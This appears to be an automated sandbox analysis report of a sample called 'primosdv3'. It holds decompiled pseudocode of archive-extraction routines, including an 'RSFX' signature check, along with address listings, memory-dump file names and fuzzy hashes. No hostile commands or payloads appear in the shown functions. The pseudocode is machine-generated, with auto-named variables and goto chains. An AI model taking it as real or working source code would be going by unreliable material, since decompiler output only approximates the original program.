									_t113 = E00C63B2D(_t167, _t210, _t220);
									__eflags = _t113;
									 *((char*)(_t226 - 0xe)) = _t113 != 0;
									__eflags = _t113;
									if(_t113 == 0) {
										L38:
										_t114 =  *((intOrPtr*)(_t226 - 0xd));
										L39:
										_t184 =  *((intOrPtr*)(_t167 + 0x6cdd));
										__eflags = _t184;
										if(_t184 == 0) {
											L41:
											__eflags =  *((char*)(_t167 + 0x6cdc));
											if( *((char*)(_t167 + 0x6cdc)) != 0) {
												L43:
												__eflags = _t184;
												if(__eflags == 0) {
													E00C6138B(__eflags, 0x1b, _t167 + 0x32);
												}
												__eflags =  *((char*)(_t226 + 8));
												if( *((char*)(_t226 + 8)) == 0) {
													goto L23;
												} else {
													L46:
													__eflags =  *((char*)(_t226 - 0xe));
													 *((char*)(_t167 + 0x6cce)) =  *((intOrPtr*)(_t167 + 0x223c));
													if( *((char*)(_t226 - 0xe)) == 0) {
														L69:
														__eflags =  *((char*)(_t167 + 0x6ccd));
														if( *((char*)(_t167 + 0x6ccd)) == 0) {
															L71:
															E00C70602(_t167 + 0x6d12, _t167 + 0x32, 0x800);
															L72:
															_t101 = 1;
															goto L24;
														}
														__eflags =  *((char*)(_t167 + 0x6cd1));
														if( *((char*)(_t167 + 0x6cd1)) == 0) {
															goto L72;
														}
														goto L71;
													}
													__eflags =  *((char*)(_t167 + 0x21f8));
													if( *((char*)(_t167 + 0x21f8)) == 0) {
														L49:
														__eflags =  *((intOrPtr*)(_t167 + 0x10)) - 1;
														if( *((intOrPtr*)(_t167 + 0x10)) == 1) {
															goto L69;
														}
														 *0xc93278();
														_t119 =  *((intOrPtr*)( *((intOrPtr*)( *_t167 + 0x14))))(); // executed
														_t224 = _t119;
														_t214 = _t210;
														 *((intOrPtr*)(_t226 - 0x18)) =  *((intOrPtr*)(_t167 + 0x6cb8));
														 *(_t226 - 0x14) =  *(_t167 + 0x6cbc);
														 *((intOrPtr*)(_t226 - 0x1c)) =  *((intOrPtr*)(_t167 + 0x6cc0));
														 *((intOrPtr*)(_t226 - 0x20)) =  *((intOrPtr*)(_t167 + 0x6cc4));
														 *((intOrPtr*)(_t226 - 0x24)) =  *((intOrPtr*)(_t167 + 0x21f4));
														while(1) {
															_t125 = E00C63B2D(_t167, _t210, _t224);
															__eflags = _t125;
															if(_t125 == 0) {
																break;
															}
															_t126 =  *((intOrPtr*)(_t167 + 0x21f4));
															__eflags = _t126 - 3;
															if(_t126 != 3) {
																__eflags = _t126 - 2;
																if(_t126 == 2) {
																	__eflags =  *((char*)(_t167 + 0x6ccd));
																	if( *((char*)(_t167 + 0x6ccd)) == 0) {
																		L66:
																		_t127 = 0;
																		__eflags = 0;
																		L67:
																		 *((char*)(_t167 + 0x6cd1)) = _t127;
																		L68:
																		 *((intOrPtr*)(_t167 + 0x6cb8)) =  *((intOrPtr*)(_t226 - 0x18));
																		 *(_t167 + 0x6cbc) =  *(_t226 - 0x14);
																		 *((intOrPtr*)(_t167 + 0x6cc0)) =  *((intOrPtr*)(_t226 - 0x1c));
																		 *((intOrPtr*)(_t167 + 0x6cc4)) =  *((intOrPtr*)(_t226 - 0x20));
																		 *((intOrPtr*)(_t167 + 0x21f4)) =  *((intOrPtr*)(_t226 - 0x24));
																		 *0xc93278(_t224, _t214, 0);
																		 *( *( *_t167 + 0x10))();
																		goto L69;
																	}
																	__eflags =  *((char*)(_t167 + 0x3330));
																	if( *((char*)(_t167 + 0x3330)) != 0) {
																		goto L66;
																	}
																	_t127 = 1;
																	goto L67;
																}
																__eflags = _t126 - 5;
																if(_t126 == 5) {
																	goto L68;
																}
																L60:
																E00C61F47(_t167);
																continue;
															}
															__eflags =  *((char*)(_t167 + 0x6ccd));
															if( *((char*)(_t167 + 0x6ccd)) == 0) {
																L56:
																_t137 = 0;
																__eflags = 0;
																L57:
																 *((char*)(_t167 + 0x6cd1)) = _t137;
																goto L60;
															}
															__eflags =  *((char*)(_t167 + 0x5680));
															if( *((char*)(_t167 + 0x5680)) != 0) {
																goto L56;
															}
															_t137 = 1;
															goto L57;
														}
														goto L68;
													}
													__eflags =  *((char*)(_t167 + 0x6cd4));
													if( *((char*)(_t167 + 0x6cd4)) != 0) {
														goto L69;
													}
													goto L49;
												}
											}
											__eflags = _t114;
											if(_t114 != 0) {
												goto L46;
											}
											goto L43;
										}
										__eflags =  *((char*)(_t226 + 8));
										if( *((char*)(_t226 + 8)) == 0) {
											goto L23;
										}
										goto L41;
									}
									__eflags = 0;
									 *((char*)(_t226 - 0xd)) = 0;
									while(1) {
										E00C61F47(_t167);
										_t142 =  *((intOrPtr*)(_t167 + 0x21f4));
										__eflags = _t142 - 1;
										if(_t142 == 1) {
											break;
										}
										__eflags =  *((char*)(_t167 + 0x21f8));
										if( *((char*)(_t167 + 0x21f8)) == 0) {
											L37:
											_t143 = E00C63B2D(_t167, _t210, _t220);
											__eflags = _t143;
											 *((char*)(_t226 - 0xe)) = _t143 != 0;
											__eflags = _t143;
											if(_t143 != 0) {
												continue;
											}
											goto L38;
										}
										__eflags = _t142 - 4;
										if(_t142 == 4) {
											break;
										}
										goto L37;
									}
									_t114 = 1;
									goto L39;
								}
								_t215 = _t167 + 0x2217;
								_t220 =  *( *_t167 + 0xc);
								 *0xc93278(_t215, 1);
								_t146 =  *( *( *_t167 + 0xc))();
								__eflags = _t146 - 1;
								if(_t146 != 1) {
									goto L23;
								}
								__eflags =  *_t215;
								if( *_t215 != 0) {
									goto L23;
								}
								_t212 = 8;
								goto L32;
							}
							E00C6138B(_t234, 0x3c, _t167 + 0x32);
							goto L23;
						}
						E00C615FB(_t182);
						goto L23;
					} else {
						goto L5;
					}
					do {
						L5:
						_t198 =  *((intOrPtr*)(_t226 - 0x38)) + _t220;
						__eflags =  *_t198 - 0x52;
						if( *_t198 != 0x52) {
							goto L16;
						}
						_t151 = E00C61DF8(_t198, _t109 - _t220);
						__eflags = _t151;
						if(_t151 == 0) {
							L15:
							_t109 =  *(_t226 - 0x14);
							goto L16;
						}
						_t199 =  *((intOrPtr*)(_t226 - 0x18));
						 *(_t167 + 0x6cc8) = _t151;
						__eflags = _t151 - 1;
						if(_t151 != 1) {
							L18:
							_t200 = _t199 + _t220;
							 *(_t167 + 0x6cd8) = _t200;
							_t220 =  *( *_t167 + 0x10);
							 *0xc93278(_t200, 0, 0);
							 *( *( *_t167 + 0x10))();
							_t155 =  *(_t167 + 0x6cc8);
							__eflags = _t155 - 2;
							if(_t155 == 2) {
								L20:
								_t220 =  *( *_t167 + 0xc);
								 *0xc93278(_t167 + 0x2210, _t212);
								 *( *( *_t167 + 0xc))();
								goto L21;
							}
							__eflags = _t155 - 3;
							if(_t155 != 3) {
								goto L21;
							}
							goto L20;
						}
						__eflags = _t220;
						if(_t220 <= 0) {
							goto L18;
						}
						__eflags = _t199 - 0x1c;
						if(_t199 >= 0x1c) {
							goto L18;
						}
						__eflags =  *(_t226 - 0x14) - 0x1f;
						if( *(_t226 - 0x14) <= 0x1f) {
							goto L18;
						}
						_t160 =  *((intOrPtr*)(_t226 - 0x38)) - _t199;
						__eflags =  *((char*)(_t160 + 0x1c)) - 0x52;
						if( *((char*)(_t160 + 0x1c)) != 0x52) {
							goto L15;
						}
						__eflags =  *((char*)(_t160 + 0x1d)) - 0x53;
						if( *((char*)(_t160 + 0x1d)) != 0x53) {
							goto L15;
						}
						__eflags =  *((char*)(_t160 + 0x1e)) - 0x46;
						if( *((char*)(_t160 + 0x1e)) != 0x46) {
							goto L15;
						}
						__eflags =  *((char*)(_t160 + 0x1f)) - 0x58;
						if( *((char*)(_t160 + 0x1f)) == 0x58) {
							goto L18;
						}
						goto L15;
						L16:
						_t220 = _t220 + 1;
						__eflags = _t220 - _t109;
					} while (_t220 < _t109);
					goto L21;
				}
				 *(_t167 + 0x6cc8) = _t103;
				if(_t103 == 1) {
					_t216 =  *_t167;
					_t220 =  *(_t216 + 0x14);
					 *0xc93278(0);
					_t162 =  *( *(_t216 + 0x14))();
					asm("sbb edx, 0x0");
					 *0xc93278(_t162 - 7, __edx);
					 *((intOrPtr*)(_t216 + 0x10))();
					_t212 = 7;
				}
				goto L26;
			}

0x00c61a04
0x00c61a09
0x00c61a13
0x00c61a18
0x00c61a23
0x00c61a2f
0x00c61a36
0x00c61a42
0x00c61ba0
0x00c61ba0
0x00c61ba2
0x00c61ba8
0x00c61bb0
0x00c61bb0
0x00c61a4f
0x00c61a52
0x00c61a58
0x00c61a5f
0x00c61aa8
0x00c61aaf
0x00c61ab7
0x00c61abf
0x00c61acd
0x00c61ad3
0x00c61adb
0x00c61ade
0x00c61ae0
0x00c61ae2
0x00c61ae5
0x00c61ae7
0x00c61b8f
0x00c61b8f
0x00c61b96
0x00c61b99
0x00c61bb3
0x00c61bb3
0x00c61bb3
0x00c61bb7
0x00c61bbc
0x00c61bbc
0x00c61bc2
0x00c61bc5
0x00c61bd4
0x00c61bd7
0x00c61c00
0x00c61c02
0x00c61c0a
0x00c61c0d
0x00c61c12
0x00c61c14
0x00c61c18
0x00c61c1a
0x00c61c5a
0x00c61c5a
0x00c61c5d
0x00c61c5d
0x00c61c63
0x00c61c65
0x00c61c71
0x00c61c71
0x00c61c78
0x00c61c7e
0x00c61c7e
0x00c61c80
0x00c61c88
0x00c61c88
0x00c61c8d
0x00c61c91
0x00000000
0x00c61c97
0x00c61c97
0x00c61c97
0x00c61ca1
0x00c61ca7
0x00c61dc1
0x00c61dc1
0x00c61dc8
0x00c61dd3
0x00c61de3
0x00c61de8
0x00c61de8
0x00000000
0x00c61de8
0x00c61dca
0x00c61dd1
0x00000000
0x00000000
0x00000000
0x00c61dd1
0x00c61cad
0x00c61cb4
0x00c61cc3
0x00c61cc3
0x00c61cc7
0x00000000
0x00000000
0x00c61cd4
0x00c61cdc
0x00c61cde
0x00c61ce0
0x00c61ce8
0x00c61cf1
0x00c61cfa
0x00c61d03
0x00c61d0c
0x00c61d54
0x00c61d56
0x00c61d5b
0x00c61d5d
0x00000000
0x00000000
0x00c61d18
0x00c61d1e
0x00c61d21
0x00c61d43
0x00c61d46
0x00c61d61
0x00c61d68
0x00c61d77
0x00c61d77
0x00c61d77
0x00c61d79
0x00c61d79
0x00c61d7f
0x00c61d82
0x00c61d8b
0x00c61d94
0x00c61d9d
0x00c61da6
0x00c61db7
0x00c61dbf
0x00000000
0x00c61dbf
0x00c61d6a
0x00c61d71
0x00000000
0x00000000
0x00c61d73
0x00000000
0x00c61d73
0x00c61d48
0x00c61d4b
0x00000000
0x00000000
0x00c61d4d
0x00c61d4f
0x00000000
0x00c61d4f
0x00c61d23
0x00c61d2a
0x00c61d39
0x00c61d39
0x00c61d39
0x00c61d3b
0x00c61d3b
0x00000000
0x00c61d3b
0x00c61d2c
0x00c61d33
0x00000000
0x00000000
0x00c61d35
0x00000000
0x00c61d35
0x00000000
0x00c61d5f
0x00c61cb6
0x00c61cbd
0x00000000
0x00000000
0x00000000
0x00c61cbd
0x00c61c91
0x00c61c7a
0x00c61c7c
0x00000000
0x00000000
0x00000000
0x00c61c7c
0x00c61c67
0x00c61c6b
0x00000000
0x00000000
0x00000000
0x00c61c6b
0x00c61c1c
0x00c61c1e
0x00c61c21
0x00c61c23
0x00c61c28
0x00c61c2e
0x00c61c31
0x00000000
0x00000000
0x00c61c37
0x00c61c3e
0x00c61c49
0x00c61c4b
0x00c61c50
0x00c61c52
0x00c61c56
0x00c61c58
0x00000000
0x00000000
0x00000000
0x00c61c58
0x00c61c40
0x00c61c43
0x00000000
0x00000000
0x00000000
0x00c61c43
0x00c61d11
0x00000000
0x00c61d11
0x00c61bdb
0x00c61be4
0x00c61be9
0x00c61bf1
0x00c61bf3
0x00c61bf6
0x00000000
0x00000000
0x00c61bf8
0x00c61bfb
0x00000000
0x00000000
0x00c61bff
0x00000000
0x00c61bff
0x00c61bcd
0x00000000
0x00c61bcd
0x00c61b9b
0x00000000
0x00000000
0x00000000
0x00000000
0x00c61aed
0x00c61aed
0x00c61af0
0x00c61af2
0x00c61af5
0x00000000
0x00000000
0x00c61afb
0x00c61b00
0x00c61b02
0x00c61b3e
0x00c61b3e
0x00000000
0x00c61b3e
0x00c61b04
0x00c61b07
0x00c61b0d
0x00c61b10
0x00c61b48
0x00c61b4a
0x00c61b50
0x00c61b56
0x00c61b5c
0x00c61b64
0x00c61b66
0x00c61b6c
0x00c61b6f
0x00c61b76
0x00c61b80
0x00c61b85
0x00c61b8d
0x00000000
0x00c61b8d
0x00c61b71
0x00c61b74
0x00000000
0x00000000
0x00000000
0x00c61b74
0x00c61b12
0x00c61b14
0x00000000
0x00000000
0x00c61b16
0x00c61b19
0x00000000
0x00000000
0x00c61b1b
0x00c61b1f
0x00000000
0x00000000
0x00c61b24
0x00c61b26
0x00c61b2a
0x00000000
0x00000000
0x00c61b2c
0x00c61b30
0x00000000
0x00000000
0x00c61b32
0x00c61b36
0x00000000
0x00000000
0x00c61b38
0x00c61b3c
0x00000000
0x00000000
0x00000000
0x00c61b41
0x00c61b41
0x00c61b42
0x00c61b42
0x00000000
0x00c61b46
0x00c61a61
0x00c61a6a
0x00c61a70
0x00c61a73
0x00c61a78
0x00c61a80
0x00c61a88
0x00c61a8d
0x00c61a95
0x00c61a9a
0x00c61a9a
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00C61A09

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 87f2ae3b1e6c22bd3e512633e34c43b67838f2e22ccdaf6569d0b2a2f0c5a08a
Instruction ID: 14a9a71ebf1c499e9f2c36b6ab723ff15d9517e708efae596d3b275582bcff62
Opcode Fuzzy Hash: 87f2ae3b1e6c22bd3e512633e34c43b67838f2e22ccdaf6569d0b2a2f0c5a08a
Instruction Fuzzy Hash: 8DC1AF70A00254AFEF25CF68C4C8BAD7BA5AF55311F0C01BAEC56DB396DB309A44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C63BBA Relevance: 1.7, APIs: 1, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00C63BBA(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t79;
				signed int _t86;
				intOrPtr _t91;
				intOrPtr _t96;
				void* _t124;
				char _t125;
				intOrPtr _t133;
				signed int _t135;
				intOrPtr _t149;
				signed int _t152;
				void* _t155;
				void* _t157;

				E00C7EB78(0xc926da, _t157);
				E00C7EC50(0xe6e0);
				_t155 = __ecx;
				_t160 =  *((char*)(__ecx + 0x6cdc));
				if( *((char*)(__ecx + 0x6cdc)) == 0) {
					__eflags =  *((char*)(__ecx + 0x4608)) - 5;
					if(__eflags > 0) {
						L26:
						E00C6138B(__eflags, 0x1e, _t155 + 0x32);
						goto L27;
					}
					__eflags =  *((intOrPtr*)(__ecx + 0x6cc8)) - 3;
					__eflags =  *((intOrPtr*)(__ecx + 0x4604)) - ((0 |  *((intOrPtr*)(__ecx + 0x6cc8)) != 0x00000003) - 0x00000001 & 0x00000015) + 0x1d;
					if(__eflags > 0) {
						goto L26;
					}
					_t86 =  *(__ecx + 0x5640) |  *(__ecx + 0x5644);
					__eflags = _t86;
					if(_t86 != 0) {
						L7:
						_t124 = _t155 + 0x20f8;
						E00C6CFD4(_t86, _t124);
						_push(_t124);
						E00C72089(_t157 - 0xe6ec, __eflags);
						_t125 = 0;
						_push(0);
						_push( *((intOrPtr*)(_t155 + 0x56dc)));
						 *((intOrPtr*)(_t157 - 4)) = 0;
						E00C73377(0, _t157 - 0xe6ec);
						_t152 =  *(_t157 + 8);
						__eflags =  *(_t157 + 0xc);
						if( *(_t157 + 0xc) != 0) {
							L15:
							__eflags =  *((intOrPtr*)(_t155 + 0x5683)) - _t125;
							if( *((intOrPtr*)(_t155 + 0x5683)) == _t125) {
								L18:
								E00C6AB1A(_t155 + 0x21b8, _t149,  *((intOrPtr*)(_t155 + 0x5658)), 1);
								_t133 =  *((intOrPtr*)(_t155 + 0x5644));
								_t91 =  *((intOrPtr*)(_t155 + 0x5640));
								 *((intOrPtr*)(_t155 + 0x2124)) = _t133;
								 *((intOrPtr*)(_t155 + 0x211c)) = _t133;
								 *((intOrPtr*)(_t155 + 0x2120)) = _t91;
								 *((intOrPtr*)(_t155 + 0x2118)) = _t91;
								 *((char*)(_t155 + 0x2128)) = _t125;
								E00C6D099(_t155 + 0x20f8, _t155,  *(_t157 + 0xc));
								 *((char*)(_t155 + 0x2129)) =  *((intOrPtr*)(_t157 + 0x10));
								 *((char*)(_t155 + 0x214f)) =  *((intOrPtr*)(_t155 + 0x5681));
								 *((intOrPtr*)(_t155 + 0x2138)) = _t155 + 0x45e8;
								 *((intOrPtr*)(_t155 + 0x213c)) = _t125;
								_t96 =  *((intOrPtr*)(_t155 + 0x5648));
								_t135 =  *(_t155 + 0x564c);
								 *((intOrPtr*)(_t157 - 0x9aa4)) = _t96;
								 *(_t157 - 0x9aa0) = _t135;
								 *((char*)(_t157 - 0x9a8c)) = _t125;
								__eflags =  *((intOrPtr*)(_t155 + 0x4608)) - _t125;
								if(__eflags != 0) {
									E00C73020(_t157 - 0xe6ec,  *((intOrPtr*)(_t155 + 0x4604)), _t125);
								} else {
									_push(_t135);
									_push(_t96);
									_push(_t155 + 0x20f8); // executed
									E00C69215(_t125, _t152, __eflags); // executed
								}
								asm("sbb eax, eax");
								__eflags = E00C6AAEA(_t125, _t155 + 0x21b8, _t155 + 0x5658,  ~( *(_t155 + 0x56b2) & 0x000000ff) & _t155 + 0x000056b3);
								if(__eflags != 0) {
									_t125 = 1;
								} else {
									E00C62021(__eflags, 0x1f, _t155 + 0x32, _t155 + 0x4610);
									E00C66D83(0xca1098, 3);
									__eflags = _t152;
									if(_t152 != 0) {
										E00C63EDE(_t152);
									}
								}
								L25:
								E00C72297(_t157 - 0xe6ec, _t152, _t155);
								_t79 = _t125;
								goto L28;
							}
							_t149 =  *((intOrPtr*)(_t155 + 0x21d4));
							__eflags =  *((intOrPtr*)(_t149 + 0x6124)) - _t125;
							if( *((intOrPtr*)(_t149 + 0x6124)) == _t125) {
								goto L25;
							}
							asm("sbb ecx, ecx");
							_t144 =  ~( *(_t155 + 0x5688) & 0x000000ff) & _t155 + 0x00005689;
							__eflags =  ~( *(_t155 + 0x5688) & 0x000000ff) & _t155 + 0x00005689;
							E00C6D051(_t155 + 0x20f8, _t125,  *((intOrPtr*)(_t155 + 0x5684)), _t149 + 0x6024, _t144, _t155 + 0x5699,  *((intOrPtr*)(_t155 + 0x56d4)), _t155 + 0x56b3, _t155 + 0x56aa);
							goto L18;
						}
						__eflags =  *(_t155 + 0x564c);
						if(__eflags < 0) {
							L12:
							__eflags = _t152;
							if(_t152 != 0) {
								E00C620BD(_t152,  *((intOrPtr*)(_t155 + 0x5648)));
								E00C6D0B6(_t155 + 0x20f8,  *_t152,  *((intOrPtr*)(_t155 + 0x5648)));
							} else {
								 *((char*)(_t155 + 0x2129)) = 1;
							}
							goto L15;
						}
						if(__eflags > 0) {
							L11:
							E00C6138B(__eflags, 0x1e, _t155 + 0x32);
							goto L25;
						}
						__eflags =  *((intOrPtr*)(_t155 + 0x5648)) - 0x1000000;
						if(__eflags <= 0) {
							goto L12;
						}
						goto L11;
					}
					__eflags =  *((intOrPtr*)(__ecx + 0x5681)) - _t86;
					if( *((intOrPtr*)(__ecx + 0x5681)) != _t86) {
						goto L7;
					} else {
						_t79 = 1;
						goto L28;
					}
				} else {
					E00C6138B(_t160, 0x1d, __ecx + 0x32);
					E00C66D83(0xca1098, 3);
					L27:
					_t79 = 0;
					L28:
					 *[fs:0x0] =  *((intOrPtr*)(_t157 - 0xc));
					return _t79;
				}
			}

0x00c63bbf
0x00c63bc9
0x00c63bcf
0x00c63bd1
0x00c63bd8
0x00c63bf6
0x00c63bfd
0x00c63e51
0x00c63e57
0x00000000
0x00c63e57
0x00c63c05
0x00c63c16
0x00c63c1c
0x00000000
0x00000000
0x00c63c28
0x00c63c28
0x00c63c2e
0x00c63c3f
0x00c63c40
0x00c63c49
0x00c63c4e
0x00c63c55
0x00c63c5a
0x00c63c62
0x00c63c63
0x00c63c69
0x00c63c6c
0x00c63c71
0x00c63c74
0x00c63c77
0x00c63ccc
0x00c63ccc
0x00c63cd2
0x00c63d2e
0x00c63d3c
0x00c63d41
0x00c63d4a
0x00c63d50
0x00c63d56
0x00c63d63
0x00c63d69
0x00c63d6f
0x00c63d75
0x00c63d7d
0x00c63d89
0x00c63d95
0x00c63d9b
0x00c63da1
0x00c63da7
0x00c63dad
0x00c63db3
0x00c63db9
0x00c63dbf
0x00c63dc5
0x00c63de4
0x00c63dc7
0x00c63dc7
0x00c63dc8
0x00c63dcf
0x00c63dd0
0x00c63dd0
0x00c63dfe
0x00c63e0f
0x00c63e11
0x00c63e3e
0x00c63e13
0x00c63e20
0x00c63e2c
0x00c63e31
0x00c63e33
0x00c63e37
0x00c63e37
0x00c63e33
0x00c63e40
0x00c63e46
0x00c63e4c
0x00000000
0x00c63e4e
0x00c63cd4
0x00c63cda
0x00c63ce0
0x00000000
0x00000000
0x00c63d10
0x00c63d12
0x00c63d12
0x00c63d29
0x00000000
0x00c63d29
0x00c63c79
0x00c63c7f
0x00c63c9f
0x00c63c9f
0x00c63ca1
0x00c63cb4
0x00c63cc7
0x00c63ca3
0x00c63ca3
0x00c63ca3
0x00000000
0x00c63ca1
0x00c63c81
0x00c63c8f
0x00c63c95
0x00000000
0x00c63c95
0x00c63c83
0x00c63c8d
0x00000000
0x00000000
0x00000000
0x00c63c8d
0x00c63c30
0x00c63c36
0x00000000
0x00c63c38
0x00c63c38
0x00000000
0x00c63c38
0x00c63bda
0x00c63be0
0x00c63bec
0x00c63e5c
0x00c63e5c
0x00c63e5e
0x00c63e62
0x00c63e6a
0x00c63e6a

APIs

__EH_prolog.LIBCMT ref: 00C63BBF

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 49e526ca12758420f8ef5b84a18b9385c156cab5b19699b19031394c0be5f314
Instruction ID: 1d30d9231a044717ebfb8dcf590c8fee8149157bde03fd4f9941dba0b1f4732a
Opcode Fuzzy Hash: 49e526ca12758420f8ef5b84a18b9385c156cab5b19699b19031394c0be5f314
Instruction Fuzzy Hash: 4B71C571500B849EDB35DB70C8959E7B7E9AF14301F44492EF6AB87242DA327A44EF21

Uniqueness

Uniqueness Score: -1.00%

Function 00C68284 Relevance: 1.6, APIs: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00C68284(intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				char _t48;
				void* _t51;
				intOrPtr _t54;
				void* _t56;
				char _t58;
				signed int _t84;
				intOrPtr _t85;
				void* _t92;
				void* _t93;
				void* _t94;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t99;
				void* _t102;

				_t102 = __eflags;
				_t94 = __edi;
				_t92 = __edx;
				E00C7EB78(0xc92831, _t99);
				E00C7EC50(0x9d64);
				_t97 = __ecx;
				_t1 = _t99 - 0x9d70; // -38256
				_push( *((intOrPtr*)(__ecx + 8)));
				E00C613DC(_t1, __edi, _t102);
				 *((intOrPtr*)(_t99 - 4)) = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + 0x82de)) == 0) {
					_t8 = _t99 - 0x9d70; // -38256
					_t48 = E00C69F42(_t8, __edi, __ecx, __ecx + 0xfe);
					__eflags = _t48;
					if(_t48 != 0) {
						goto L3;
					}
				} else {
					 *((intOrPtr*)(_t99 - 0x9d60)) = 1;
					L3:
					_t9 = _t99 - 0x9d70; // -38256, executed
					_t51 = E00C61A04(_t9, _t92, 1); // executed
					if(_t51 != 0) {
						__eflags =  *((intOrPtr*)(_t99 - 0x3093));
						if( *((intOrPtr*)(_t99 - 0x3093)) == 0) {
							_push(_t94);
							_t95 = 0;
							__eflags =  *((intOrPtr*)(_t99 - 0x30a3));
							if(__eflags != 0) {
								_t12 = _t99 - 0x9d3e; // -38206
								_t13 = _t99 - 0x1010; // -2064
								_t65 = E00C70602(_t13, _t12, 0x800);
								__eflags =  *((intOrPtr*)(_t99 - 0x309e));
								while(1) {
									_t19 = _t99 - 0x1010; // -2064
									E00C6C0C5(_t19, 0x800, (_t65 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
									_t20 = _t99 - 0x2058; // -6232
									E00C66EDB(_t20);
									_push(0);
									_t21 = _t99 - 0x2058; // -6232
									_t22 = _t99 - 0x1010; // -2064
									__eflags = E00C6A56D(_t20, __eflags, _t22, _t21);
									if(__eflags == 0) {
										break;
									}
									_t95 = _t95 +  *((intOrPtr*)(_t99 - 0x1058));
									asm("adc ebx, [ebp-0x1054]");
									__eflags =  *((char*)(_t99 - 0x309e));
								}
								 *((intOrPtr*)(_t97 + 0xa0)) =  *((intOrPtr*)(_t97 + 0xa0)) + _t95;
								asm("adc [esi+0xa4], ebx");
							}
							_t25 = _t99 - 0x9d70; // -38256
							E00C68430(_t97, __eflags, _t25);
							_t54 =  *((intOrPtr*)(_t97 + 8));
							_t93 = 0x49;
							_pop(_t94);
							_t84 =  *(_t54 + 0x92fa) & 0x0000ffff;
							__eflags = _t84 - 0x54;
							if(_t84 == 0x54) {
								L13:
								 *((char*)(_t54 + 0x7201)) = 1;
							} else {
								__eflags = _t84 - _t93;
								if(_t84 == _t93) {
									goto L13;
								}
							}
							_t85 =  *((intOrPtr*)(_t97 + 8));
							__eflags =  *((intOrPtr*)(_t85 + 0x92fa)) - _t93;
							if( *((intOrPtr*)(_t85 + 0x92fa)) != _t93) {
								 *((char*)(_t85 + 0x7201)) =  *((char*)(_t85 + 0x7201)) == 0;
								E00C71B66((_t97 + 0x000000fe & 0xffffff00 |  *((char*)(_t85 + 0x7201)) == 0x00000000) & 0x000000ff, _t97 + 0xfe);
							}
							_t35 = _t99 - 0x9d70; // -38256
							E00C61F6D(_t35, _t93);
							do {
								_t36 = _t99 - 0x9d70; // -38256
								_t56 = E00C63B2D(_t36, _t93, _t97);
								_t37 = _t99 - 0xd; // 0x7f3
								_t38 = _t99 - 0x9d70; // -38256
								_t58 = E00C6848E(_t97, _t38, _t56, _t37); // executed
								__eflags = _t58;
							} while (_t58 != 0);
						}
					} else {
						E00C66D83(0xca1098, 1);
					}
				}
				_t39 = _t99 - 0x9d70; // -38256, executed
				E00C61692(_t39, _t94, _t97); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t99 - 0xc));
				return 0;
			}

0x00c68284
0x00c68284
0x00c68284
0x00c68289
0x00c68293
0x00c6829a
0x00c6829c
0x00c682a2
0x00c682a5
0x00c682af
0x00c682b9
0x00c682ce
0x00c682d4
0x00c682d9
0x00c682db
0x00000000
0x00000000
0x00c682bb
0x00c682bb
0x00c682e1
0x00c682e3
0x00c682e9
0x00c682f0
0x00c68303
0x00c68309
0x00c6830f
0x00c68310
0x00c68312
0x00c68318
0x00c6831f
0x00c68326
0x00c6832d
0x00c68332
0x00c6834d
0x00c68359
0x00c68360
0x00c68365
0x00c6836b
0x00c68370
0x00c68372
0x00c68379
0x00c68385
0x00c68387
0x00000000
0x00000000
0x00c6833a
0x00c68340
0x00c68346
0x00c68346
0x00c68389
0x00c6838f
0x00c6838f
0x00c68395
0x00c6839e
0x00c683a3
0x00c683a8
0x00c683a9
0x00c683aa
0x00c683b1
0x00c683b4
0x00c683bb
0x00c683bb
0x00c683b6
0x00c683b6
0x00c683b9
0x00000000
0x00000000
0x00c683b9
0x00c683c2
0x00c683c5
0x00c683cc
0x00c683dc
0x00c683e3
0x00c683e3
0x00c683e8
0x00c683ee
0x00c683f3
0x00c683f3
0x00c683f9
0x00c683fe
0x00c68403
0x00c6840c
0x00c68411
0x00c68411
0x00c683f3
0x00c682f2
0x00c682f9
0x00c682f9
0x00c682f0
0x00c68415
0x00c6841b
0x00c68427
0x00c6842f

APIs

__EH_prolog.LIBCMT ref: 00C68289

